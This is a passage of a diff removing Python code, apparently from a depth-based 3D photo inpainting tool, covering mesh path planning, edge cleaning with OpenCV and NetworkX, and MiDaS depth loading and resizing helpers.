len(npath) - 1: - for xx in npath[step:]: - if npath_map[xx[0], xx[1]] == edge_id: - npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - fpath_map[fp_node[0], fp_node[1]] = edge_id - fpaths[edge_id] = fpath - npaths[edge_id] = npath - fpath_map[valid_near_edge != 0] = -1 - if len(fpath) > 0: - iter_fpath = copy.deepcopy(fpaths[edge_id]) - for node in iter_fpath: - if valid_near_edge[node[0], node[1]] != 0: - fpaths[edge_id].remove(node) - - return fpath_map, npath_map, False, npaths, fpaths, invalid_edge_ids - -def plan_path_e2e(mesh, cc, end_pts, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None): - my_npath_map = np.zeros_like(input_edge) - 1 - my_fpath_map = np.zeros_like(input_edge) - 1 - sub_mesh = mesh.subgraph(list(cc)).copy() - ends_1, ends_2 = end_pts[0], end_pts[1] - edge_id = global_mesh.nodes[ends_1]['edge_id'] - npath = [*netx.shortest_path(sub_mesh, (ends_1[0], ends_1[1]), (ends_2[0], ends_2[1]), weight='length')] - for np_node in npath: - my_npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends_1].get('far') is None: - print("None far") - else: - fnodes = global_mesh.nodes[ends_1].get('far') - dmask = mask + 0 - while True: - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - e_fnodes = global_mesh.nodes[ends_2].get('far') - dmask = mask + 0 - while True: - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - e_ffnode = [e_fnode for e_fnode in e_fnodes if (dmask[e_fnode[0], e_fnode[1]] > 0 and mask[e_fnode[0], e_fnode[1]] == 0 and\ - global_mesh.nodes[e_fnode].get('inpaint_id') != inpaint_id + 1)] - if len(e_ffnode) > 0: - e_fnode = e_ffnode[0] - break - fpath.append((fnode[0], fnode[1])) - 
if len(e_ffnode) == 0 or len(ffnode) == 0: - return my_npath_map, my_fpath_map, [], [] - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < my_fpath_map.shape[0] and xx[1] >= 0 and xx[1] < my_fpath_map.shape[1]] - if fpath_map is not None and np.sum([fpath_map[nlne[0], nlne[1]] for nlne in new_loc_nes]) != 0: - break_flag = True - break - if my_npath_map[new_loc[0], new_loc[1]] != -1: - continue - if npath_map is not None and npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if (e_fnode[0], e_fnode[1]) not in fpath: - fpath.append((e_fnode[0], e_fnode[1])) - if step != len(npath) - 1: - for xx in npath[step:]: - if my_npath_map[xx[0], xx[1]] == edge_id: - my_npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - my_fpath_map[fp_node[0], fp_node[1]] = edge_id - - return my_fpath_map, my_npath_map, npath, fpath - -def plan_path(mesh, info_on_pix, cc, end_pt, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=None): - my_npath_map = np.zeros_like(input_edge) - 1 - my_fpath_map = np.zeros_like(input_edge) - 1 - sub_mesh = mesh.subgraph(list(cc)).copy() - pnodes = netx.periphery(sub_mesh) - ends = [*end_pt] - edge_id = global_mesh.nodes[ends[0]]['edge_id'] - pnodes = sorted(pnodes, - key=lambda x: np.hypot((x[0] - ends[0][0]), (x[1] - ends[0][1])), - reverse=True)[0] - if npath is None: - npath = [*netx.shortest_path(sub_mesh, (ends[0][0], ends[0][1]), pnodes, weight='length')] - else: - if (ends[0][0], ends[0][1]) == npath[0]: - npath = npath - elif (ends[0][0], ends[0][1]) == npath[-1]: - npath = npath[::-1] - else: - import pdb; pdb.set_trace() - for np_node in npath: - my_npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends[0]].get('far') is None: - print("None far") - 
else: - fnodes = global_mesh.nodes[ends[0]].get('far') - dmask = mask + 0 - did = 0 - while True: - did += 1 - if did > 3: - return my_fpath_map, my_npath_map, -1 - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - - fpath.append((fnode[0], fnode[1])) - disp_diff = 0. - for n_loc in npath: - if mask[n_loc[0], n_loc[1]] != 0: - disp_diff = abs(abs(1. / info_on_pix[(n_loc[0], n_loc[1])][0]['depth']) - abs(1. / ends[0][2])) - break - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < my_fpath_map.shape[0] and xx[1] >= 0 and xx[1] < my_fpath_map.shape[1]] - if fpath_map is not None and np.all([(fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break_flag = True - break - if np.all([(my_fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break_flag = True - break - if my_npath_map[new_loc[0], new_loc[1]] != -1: - continue - if npath_map is not None and npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - if valid_map[new_loc[0], new_loc[1]] == 0: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if step != len(npath) - 1: - for xx in npath[step:]: - if my_npath_map[xx[0], xx[1]] == edge_id: - my_npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - my_fpath_map[fp_node[0], fp_node[1]] = edge_id - - return my_fpath_map, my_npath_map, disp_diff - -def refresh_node(old_node, old_feat, new_node, new_feat, mesh, stime=False): - mesh.add_node(new_node) - mesh.nodes[new_node].update(new_feat) - mesh.nodes[new_node].update(old_feat) - for ne in mesh.neighbors(old_node): - mesh.add_edge(new_node, ne) - if 
mesh.nodes[new_node].get('far') is not None: - tmp_far_nodes = mesh.nodes[new_node]['far'] - for far_node in tmp_far_nodes: - if mesh.has_node(far_node) is False: - mesh.nodes[new_node]['far'].remove(far_node) - continue - if mesh.nodes[far_node].get('near') is not None: - for idx in range(len(mesh.nodes[far_node].get('near'))): - if mesh.nodes[far_node]['near'][idx][0] == new_node[0] and mesh.nodes[far_node]['near'][idx][1] == new_node[1]: - if len(mesh.nodes[far_node]['near'][idx]) == len(old_node): - mesh.nodes[far_node]['near'][idx] = new_node - if mesh.nodes[new_node].get('near') is not None: - tmp_near_nodes = mesh.nodes[new_node]['near'] - for near_node in tmp_near_nodes: - if mesh.has_node(near_node) is False: - mesh.nodes[new_node]['near'].remove(near_node) - continue - if mesh.nodes[near_node].get('far') is not None: - for idx in range(len(mesh.nodes[near_node].get('far'))): - if mesh.nodes[near_node]['far'][idx][0] == new_node[0] and mesh.nodes[near_node]['far'][idx][1] == new_node[1]: - if len(mesh.nodes[near_node]['far'][idx]) == len(old_node): - mesh.nodes[near_node]['far'][idx] = new_node - if new_node != old_node: - mesh.remove_node(old_node) - if stime is False: - return mesh - else: - return mesh, None, None - - -def create_placeholder(context, mask, depth, fpath_map, npath_map, mesh, inpaint_id, edge_ccs, extend_edge_cc, all_edge_maps, self_edge_id): - add_node_time = 0 - add_edge_time = 0 - add_far_near_time = 0 - valid_area = context + mask - H, W = mesh.graph['H'], mesh.graph['W'] - edge_cc = edge_ccs[self_edge_id] - num_com = len(edge_cc) + len(extend_edge_cc) - hxs, hys = np.where(mask > 0) - for hx, hy in zip(hxs, hys): - mesh.add_node((hx, hy), inpaint_id=inpaint_id + 1, num_context=num_com) - for hx, hy in zip(hxs, hys): - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - 0 <= x < mesh.graph['H'] and 0 <= y < mesh.graph['W'] and valid_area[x, y] != 0] - for ne in four_nes: - if mask[ne[0], ne[1]] != 0: - if not mesh.has_edge((hx, hy), ne): - mesh.add_edge((hx, hy), ne) - elif depth[ne[0], ne[1]] != 0: - if mesh.has_node((ne[0], ne[1], depth[ne[0], ne[1]])) and\ - not mesh.has_edge((hx, hy), (ne[0], ne[1], depth[ne[0], ne[1]])): - mesh.add_edge((hx, hy), (ne[0], ne[1], depth[ne[0], ne[1]])) - else: - print("Undefined context node.") - import pdb; pdb.set_trace() - near_ids = np.unique(npath_map) - if near_ids[0] == -1: near_ids = near_ids[1:] - for near_id in near_ids: - hxs, hys = np.where((fpath_map == near_id) & (mask > 0)) - if hxs.shape[0] > 0: - mesh.graph['max_edge_id'] = mesh.graph['max_edge_id'] + 1 - else: - break - for hx, hy in zip(hxs, hys): - mesh.nodes[(hx, hy)]['edge_id'] = int(round(mesh.graph['max_edge_id'])) - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - x < mesh.graph['H'] and x >= 0 and y < mesh.graph['W'] and y >= 0 and npath_map[x, y] == near_id] - for xx in four_nes: - xx_n = copy.deepcopy(xx) - if not mesh.has_node(xx_n): - if mesh.has_node((xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]])): - xx_n = (xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]]) - if mesh.has_edge((hx, hy), xx_n): - # pass - mesh.remove_edge((hx, hy), xx_n) - if mesh.nodes[(hx, hy)].get('near') is None: - mesh.nodes[(hx, hy)]['near'] = [] - mesh.nodes[(hx, hy)]['near'].append(xx_n) - connect_point_exception = set() - hxs, hys = np.where((npath_map == near_id) & (all_edge_maps > -1)) - for hx, hy in zip(hxs, hys): - unknown_id = int(round(all_edge_maps[hx, hy])) - if unknown_id != near_id 
and unknown_id != self_edge_id: - unknown_node = set([xx for xx in edge_ccs[unknown_id] if xx[0] == hx and xx[1] == hy]) - connect_point_exception |= unknown_node - hxs, hys = np.where((npath_map == near_id) & (mask > 0)) - if hxs.shape[0] > 0: - mesh.graph['max_edge_id'] = mesh.graph['max_edge_id'] + 1 - else: - break - for hx, hy in zip(hxs, hys): - mesh.nodes[(hx, hy)]['edge_id'] = int(round(mesh.graph['max_edge_id'])) - mesh.nodes[(hx, hy)]['connect_point_id'] = int(round(near_id)) - mesh.nodes[(hx, hy)]['connect_point_exception'] = connect_point_exception - four_nes = [(x, y) for x, y in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1)] if\ - x < mesh.graph['H'] and x >= 0 and y < mesh.graph['W'] and y >= 0 and fpath_map[x, y] == near_id] - for xx in four_nes: - xx_n = copy.deepcopy(xx) - if not mesh.has_node(xx_n): - if mesh.has_node((xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]])): - xx_n = (xx_n[0], xx_n[1], depth[xx_n[0], xx_n[1]]) - if mesh.has_edge((hx, hy), xx_n): - mesh.remove_edge((hx, hy), xx_n) - if mesh.nodes[(hx, hy)].get('far') is None: - mesh.nodes[(hx, hy)]['far'] = [] - mesh.nodes[(hx, hy)]['far'].append(xx_n) - - return mesh, add_node_time, add_edge_time, add_far_near_time - -def clean_far_edge(mask_edge, mask_edge_with_id, context_edge, mask, info_on_pix, global_mesh, anchor): - if isinstance(mask_edge, torch.Tensor): - if mask_edge.is_cuda: - mask_edge = mask_edge.cpu() - mask_edge = mask_edge.data - mask_edge = mask_edge.numpy() - if isinstance(context_edge, torch.Tensor): - if context_edge.is_cuda: - context_edge = context_edge.cpu() - context_edge = context_edge.data - context_edge = context_edge.numpy() - if isinstance(mask, torch.Tensor): - if mask.is_cuda: - mask = mask.cpu() - mask = mask.data - mask = mask.numpy() - mask = mask.squeeze() - mask_edge = mask_edge.squeeze() - context_edge = context_edge.squeeze() - valid_near_edge = np.zeros_like(mask_edge) - far_edge = np.zeros_like(mask_edge) - far_edge_with_id = np.ones_like(mask_edge) * -1 - near_edge_with_id = np.ones_like(mask_edge) * -1 - uncleaned_far_edge = np.zeros_like(mask_edge) - # Detect if there is any valid pixel mask_edge, if not ==> return default value - if mask_edge.sum() == 0: - return far_edge, uncleaned_far_edge, far_edge_with_id, near_edge_with_id - mask_edge_ids = dict(collections.Counter(mask_edge_with_id.flatten())).keys() - for edge_id in mask_edge_ids: - if edge_id < 0: - continue - specific_edge_map = (mask_edge_with_id == edge_id).astype(np.uint8) - _, sub_specific_edge_maps = cv2.connectedComponents(specific_edge_map.astype(np.uint8), connectivity=8) - for sub_edge_id in range(1, sub_specific_edge_maps.max() + 1): - specific_edge_map = (sub_specific_edge_maps == sub_edge_id).astype(np.uint8) - edge_pxs, edge_pys = np.where(specific_edge_map > 0) - edge_mesh = netx.Graph() - for edge_px, edge_py in zip(edge_pxs, edge_pys): - edge_mesh.add_node((edge_px, edge_py)) - for ex in [edge_px-1, edge_px, edge_px+1]: - for ey in [edge_py-1, edge_py, edge_py+1]: - if edge_px == ex and edge_py == ey: - continue - if ex < 0 or ex >= specific_edge_map.shape[0] or ey < 0 or ey >= specific_edge_map.shape[1]: - continue - if specific_edge_map[ex, ey] == 1: - if edge_mesh.has_node((ex, ey)): - edge_mesh.add_edge((ex, ey), (edge_px, edge_py)) - periphery_nodes = netx.periphery(edge_mesh) - path_diameter = netx.diameter(edge_mesh) - start_near_node = None - for node_s in periphery_nodes: - for node_e in periphery_nodes: - if node_s != node_e: - if netx.shortest_path_length(edge_mesh, node_s, 
node_e) == path_diameter: - if np.any(context_edge[node_s[0]-1:node_s[0]+2, node_s[1]-1:node_s[1]+2].flatten()): - start_near_node = (node_s[0], node_s[1]) - end_near_node = (node_e[0], node_e[1]) - break - if np.any(context_edge[node_e[0]-1:node_e[0]+2, node_e[1]-1:node_e[1]+2].flatten()): - start_near_node = (node_e[0], node_e[1]) - end_near_node = (node_s[0], node_s[1]) - break - if start_near_node is not None: - break - if start_near_node is None: - continue - new_specific_edge_map = np.zeros_like(mask) - for path_node in netx.shortest_path(edge_mesh, start_near_node, end_near_node): - new_specific_edge_map[path_node[0], path_node[1]] = 1 - context_near_pxs, context_near_pys = np.where(context_edge[start_near_node[0]-1:start_near_node[0]+2, start_near_node[1]-1:start_near_node[1]+2] > 0) - distance = np.abs((context_near_pxs - 1)) + np.abs((context_near_pys - 1)) - if (np.where(distance == distance.min())[0].shape[0]) > 1: - closest_pxs = context_near_pxs[np.where(distance == distance.min())[0]] - closest_pys = context_near_pys[np.where(distance == distance.min())[0]] - closest_depths = [] - for closest_px, closest_py in zip(closest_pxs, closest_pys): - if info_on_pix.get((closest_px + start_near_node[0] - 1 + anchor[0], closest_py + start_near_node[1] - 1 + anchor[2])) is not None: - for info in info_on_pix.get((closest_px + start_near_node[0] - 1 + anchor[0], closest_py + start_near_node[1] - 1 + anchor[2])): - if info['synthesis'] is False: - closest_depths.append(abs(info['depth'])) - context_near_px, context_near_py = closest_pxs[np.array(closest_depths).argmax()], closest_pys[np.array(closest_depths).argmax()] - else: - context_near_px, context_near_py = context_near_pxs[distance.argmin()], context_near_pys[distance.argmin()] - context_near_node = (start_near_node[0]-1 + context_near_px, start_near_node[1]-1 + context_near_py) - far_node_list = [] - global_context_near_node = (context_near_node[0] + anchor[0], context_near_node[1] + anchor[2]) - if info_on_pix.get(global_context_near_node) is not None: - for info in info_on_pix[global_context_near_node]: - if info['synthesis'] is False: - context_near_node_3d = (global_context_near_node[0], global_context_near_node[1], info['depth']) - if global_mesh.nodes[context_near_node_3d].get('far') is not None: - for far_node in global_mesh.nodes[context_near_node_3d].get('far'): - far_node = (far_node[0] - anchor[0], far_node[1] - anchor[2], far_node[2]) - if mask[far_node[0], far_node[1]] == 0: - far_node_list.append([far_node[0], far_node[1]]) - if len(far_node_list) > 0: - far_nodes_dist = np.sum(np.abs(np.array(far_node_list) - np.array([[edge_px, edge_py]])), axis=1) - context_far_node = tuple(far_node_list[far_nodes_dist.argmin()]) - corresponding_far_edge = np.zeros_like(mask_edge) - corresponding_far_edge[context_far_node[0], context_far_node[1]] = 1 - surround_map = cv2.dilate(new_specific_edge_map.astype(np.uint8), - np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), - iterations=1) - specific_edge_map_wo_end_pt = new_specific_edge_map.copy() - specific_edge_map_wo_end_pt[end_near_node[0], end_near_node[1]] = 0 - surround_map_wo_end_pt = cv2.dilate(specific_edge_map_wo_end_pt.astype(np.uint8), - np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), - iterations=1) - surround_map_wo_end_pt[new_specific_edge_map > 0] = 0 - surround_map_wo_end_pt[context_near_node[0], context_near_node[1]] = 0 - surround_map = surround_map_wo_end_pt.copy() - _, far_edge_cc = cv2.connectedComponents(surround_map.astype(np.uint8), connectivity=4) 
- start_far_node = None - accompany_far_node = None - if surround_map[context_far_node[0], context_far_node[1]] == 1: - start_far_node = context_far_node - else: - four_nes = [(context_far_node[0] - 1, context_far_node[1]), - (context_far_node[0] + 1, context_far_node[1]), - (context_far_node[0], context_far_node[1] - 1), - (context_far_node[0], context_far_node[1] + 1)] - candidate_bevel = [] - for ne in four_nes: - if surround_map[ne[0], ne[1]] == 1: - start_far_node = (ne[0], ne[1]) - break - elif (ne[0] != context_near_node[0] or ne[1] != context_near_node[1]) and \ - (ne[0] != start_near_node[0] or ne[1] != start_near_node[1]): - candidate_bevel.append((ne[0], ne[1])) - if start_far_node is None: - for ne in candidate_bevel: - if ne[0] == context_far_node[0]: - bevel_xys = [[ne[0] + 1, ne[1]], [ne[0] - 1, ne[1]]] - if ne[1] == context_far_node[1]: - bevel_xys = [[ne[0], ne[1] + 1], [ne[0], ne[1] - 1]] - for bevel_x, bevel_y in bevel_xys: - if surround_map[bevel_x, bevel_y] == 1: - start_far_node = (bevel_x, bevel_y) - accompany_far_node = (ne[0], ne[1]) - break - if start_far_node is not None: - break - if start_far_node is not None: - for far_edge_id in range(1, far_edge_cc.max() + 1): - specific_far_edge = (far_edge_cc == far_edge_id).astype(np.uint8) - if specific_far_edge[start_far_node[0], start_far_node[1]] == 1: - if accompany_far_node is not None: - specific_far_edge[accompany_far_node] = 1 - far_edge[specific_far_edge > 0] = 1 - far_edge_with_id[specific_far_edge > 0] = edge_id - end_far_candidates = np.zeros_like(far_edge) - end_far_candidates[end_near_node[0], end_near_node[1]] = 1 - end_far_candidates = cv2.dilate(end_far_candidates.astype(np.uint8), - np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), - iterations=1) - end_far_candidates[end_near_node[0], end_near_node[1]] = 0 - invalid_nodes = (((far_edge_cc != far_edge_id).astype(np.uint8) * \ - (far_edge_cc != 0).astype(np.uint8)).astype(np.uint8) + \ - (new_specific_edge_map).astype(np.uint8) + \ - (mask == 0).astype(np.uint8)).clip(0, 1) - end_far_candidates[invalid_nodes > 0] = 0 - far_edge[end_far_candidates > 0] = 1 - far_edge_with_id[end_far_candidates > 0] = edge_id - - far_edge[context_far_node[0], context_far_node[1]] = 1 - far_edge_with_id[context_far_node[0], context_far_node[1]] = edge_id - near_edge_with_id[(mask_edge_with_id == edge_id) > 0] = edge_id - uncleaned_far_edge = far_edge.copy() - far_edge[mask == 0] = 0 - - return far_edge, uncleaned_far_edge, far_edge_with_id, near_edge_with_id - -def get_MiDaS_samples(image_folder, depth_folder, config, specific=None, aft_certain=None): - lines = [os.path.splitext(os.path.basename(xx))[0] for xx in glob.glob(os.path.join(image_folder, '*' + config['img_format']))] - samples = [] - generic_pose = np.eye(4) - assert len(config['traj_types']) == len(config['x_shift_range']) ==\ - len(config['y_shift_range']) == len(config['z_shift_range']) == len(config['video_postfix']), \ - "The number of elements in 'traj_types', 'x_shift_range', 'y_shift_range', 'z_shift_range' and \ - 'video_postfix' should be equal." - tgt_pose = [[generic_pose * 1]] - tgts_poses = [] - for traj_idx in range(len(config['traj_types'])): - tgt_poses = [] - sx, sy, sz = path_planning(config['num_frames'], config['x_shift_range'][traj_idx], config['y_shift_range'][traj_idx], - config['z_shift_range'][traj_idx], path_type=config['traj_types'][traj_idx]) - for xx, yy, zz in zip(sx, sy, sz): - tgt_poses.append(generic_pose * 1.) 
- tgt_poses[-1][:3, -1] = np.array([xx, yy, zz]) - tgts_poses += [tgt_poses] - tgt_pose = generic_pose * 1 - - aft_flag = True - if aft_certain is not None and len(aft_certain) > 0: - aft_flag = False - for seq_dir in lines: - if specific is not None and len(specific) > 0: - if specific != seq_dir: - continue - if aft_certain is not None and len(aft_certain) > 0: - if aft_certain == seq_dir: - aft_flag = True - if aft_flag is False: - continue - samples.append({}) - sdict = samples[-1] - sdict['depth_fi'] = os.path.join(depth_folder, seq_dir + config['depth_format']) - sdict['ref_img_fi'] = os.path.join(image_folder, seq_dir + config['img_format']) - H, W = imageio.imread(sdict['ref_img_fi']).shape[:2] - sdict['int_mtx'] = np.array([[max(H, W), 0, W//2], [0, max(H, W), H//2], [0, 0, 1]]).astype(np.float32) - if sdict['int_mtx'].max() > 1: - sdict['int_mtx'][0, :] = sdict['int_mtx'][0, :] / float(W) - sdict['int_mtx'][1, :] = sdict['int_mtx'][1, :] / float(H) - sdict['ref_pose'] = np.eye(4) - sdict['tgt_pose'] = tgt_pose - sdict['tgts_poses'] = tgts_poses - sdict['video_postfix'] = config['video_postfix'] - sdict['tgt_name'] = [os.path.splitext(os.path.basename(sdict['depth_fi']))[0]] - sdict['src_pair_name'] = sdict['tgt_name'][0] - - return samples - -def get_valid_size(imap): - x_max = np.where(imap.sum(1).squeeze() > 0)[0].max() + 1 - x_min = np.where(imap.sum(1).squeeze() > 0)[0].min() - y_max = np.where(imap.sum(0).squeeze() > 0)[0].max() + 1 - y_min = np.where(imap.sum(0).squeeze() > 0)[0].min() - size_dict = {'x_max':x_max, 'y_max':y_max, 'x_min':x_min, 'y_min':y_min} - - return size_dict - -def dilate_valid_size(isize_dict, imap, dilate=[0, 0]): - osize_dict = copy.deepcopy(isize_dict) - osize_dict['x_min'] = max(0, osize_dict['x_min'] - dilate[0]) - osize_dict['x_max'] = min(imap.shape[0], osize_dict['x_max'] + dilate[0]) - osize_dict['y_min'] = max(0, osize_dict['y_min'] - dilate[0]) - osize_dict['y_max'] = min(imap.shape[1], osize_dict['y_max'] + dilate[1]) - - return osize_dict - -def crop_maps_by_size(size, *imaps): - omaps = [] - for imap in imaps: - omaps.append(imap[size['x_min']:size['x_max'], size['y_min']:size['y_max']].copy()) - - return omaps - -def smooth_cntsyn_gap(init_depth_map, mask_region, context_region, init_mask_region=None): - if init_mask_region is not None: - curr_mask_region = init_mask_region * 1 - else: - curr_mask_region = mask_region * 0 - depth_map = init_depth_map.copy() - for _ in range(2): - cm_mask = context_region + curr_mask_region - depth_s1 = np.roll(depth_map, 1, 0) - depth_s2 = np.roll(depth_map, -1, 0) - depth_s3 = np.roll(depth_map, 1, 1) - depth_s4 = np.roll(depth_map, -1, 1) - mask_s1 = np.roll(cm_mask, 1, 0) - mask_s2 = np.roll(cm_mask, -1, 0) - mask_s3 = np.roll(cm_mask, 1, 1) - mask_s4 = np.roll(cm_mask, -1, 1) - fluxin_depths = (depth_s1 * mask_s1 + depth_s2 * mask_s2 + depth_s3 * mask_s3 + depth_s4 * mask_s4) / \ - ((mask_s1 + mask_s2 + mask_s3 + mask_s4) + 1e-6) - fluxin_mask = (fluxin_depths != 0) * mask_region - init_mask = (fluxin_mask * (curr_mask_region >= 0).astype(np.float32) > 0).astype(np.uint8) - depth_map[init_mask > 0] = fluxin_depths[init_mask > 0] - if init_mask.shape[-1] > curr_mask_region.shape[-1]: - curr_mask_region[init_mask.sum(-1, keepdims=True) > 0] = 1 - else: - curr_mask_region[init_mask > 0] = 1 - depth_map[fluxin_mask > 0] = fluxin_depths[fluxin_mask > 0] - - return depth_map - -def read_MiDaS_depth(disp_fi, disp_rescale=10., h=None, w=None): - if 'npy' in os.path.splitext(disp_fi)[-1]: - disp = 
np.load(disp_fi) - else: - disp = imageio.imread(disp_fi).astype(np.float32) - disp = disp - disp.min() - disp = cv2.blur(disp / disp.max(), ksize=(3, 3)) * disp.max() - disp = (disp / disp.max()) * disp_rescale - if h is not None and w is not None: - disp = resize(disp / disp.max(), (h, w), order=1) * disp.max() - depth = 1. / np.maximum(disp, 0.05) - - return depth - -def follow_image_aspect_ratio(depth, image): - H, W = image.shape[:2] - image_aspect_ratio = H / W - dH, dW = depth.shape[:2] - depth_aspect_ratio = dH / dW - if depth_aspect_ratio > image_aspect_ratio: - resize_H = dH - resize_W = dH / image_aspect_ratio - else: - resize_W = dW - resize_H = dW * image_aspect_ratio - depth = resize(depth / depth.max(), - (int(resize_H), - int(resize_W)), - order=0) * depth.max() - - return depth - -def depth_resize(depth, origin_size, image_size): - if origin_size[0] is not 0: - max_depth = depth.max() - depth = depth / max_depth - depth = resize(depth, origin_size, order=1, mode='edge') - depth = depth * max_depth - else: - max_depth = depth.max() - depth = depth / max_depth - depth = resize(depth, image_size, order=1, mode='edge') - depth = depth * max_depth - - return depth - -def filter_irrelevant_edge(self_edge, other_edges, other_edges_with_id, current_edge_id, context, edge_ccs, mesh, anchor): - other_edges = other_edges.squeeze() - other_edges_with_id = other_edges_with_id.squeeze() - - self_edge = self_edge.squeeze() - dilate_self_edge = cv2.dilate(self_edge.astype(np.uint8), np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), iterations=1) - edge_ids = collections.Counter(other_edges_with_id.flatten()).keys() - other_edges_info = [] - # import ipdb - # ipdb.set_trace() - for edge_id in edge_ids: - edge_id = int(edge_id) - if edge_id >= 0: - condition = ((other_edges_with_id == edge_id) * other_edges * context).astype(np.uint8) - if dilate_self_edge[condition > 0].sum() == 0: - other_edges[other_edges_with_id == edge_id] = 0 - else: - num_condition, condition_labels = cv2.connectedComponents(condition, connectivity=8) - for condition_id in range(1, num_condition): - isolate_condition = ((condition_labels == condition_id) > 0).astype(np.uint8) - num_end_group, end_group = cv2.connectedComponents(((dilate_self_edge * isolate_condition) > 